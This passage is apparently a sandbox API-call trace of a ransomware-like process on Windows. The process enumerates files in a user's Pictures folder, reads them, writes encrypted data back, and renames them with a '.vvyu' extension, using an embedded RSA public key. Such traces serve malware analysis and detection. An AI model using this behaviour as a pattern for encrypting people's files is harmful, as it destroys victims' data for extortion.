Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f30 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f78 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3420 | out: hHeap=0x2c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.792] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x170a5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x170a5, lpOverlapped=0x0) returned 1 [0190.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.793] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x170aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.793] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.794] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.795] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.795] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.795] CloseHandle (hObject=0x584) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.797] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Iv7Y.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\iv7y.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Iv7Y.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\iv7y.bmp.vvyu")) returned 1 [0190.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.799] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2b8710, ftCreationTime.dwHighDateTime=0x1d8a34a, ftLastAccessTime.dwLowDateTime=0x8a018220, ftLastAccessTime.dwHighDateTime=0x1d8a5e8, ftLastWriteTime.dwLowDateTime=0x8a018220, ftLastWriteTime.dwHighDateTime=0x1d8a5e8, nFileSizeHigh=0x0, nFileSizeLow=0x72a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="khH4Ja_FfUDbLB.gif", cAlternateFileName="KHH4JA~1.GIF")) returned 1 [0190.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3420 [0190.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3420 | out: hHeap=0x2c0000) returned 1 [0190.801] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\khH4Ja_FfUDbLB.gif") returned=".gif" [0190.801] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\khH4Ja_FfUDbLB.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\khh4ja_ffudblb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.802] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=29348) returned 1 [0190.802] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.805] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x727e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.805] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.807] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.807] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x72a4, lpOverlapped=0x0) returned 1 [0190.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.811] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.812] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.812] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.812] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.812] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.812] GetLastError () returned 0x0 [0190.813] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.813] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.813] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.813] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.813] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x72a0) returned 0x2af5168 [0190.814] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3420 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3468 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5ee8 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.817] GetCurrentThreadId () returned 0x5d8 [0190.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae52f8 [0190.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, 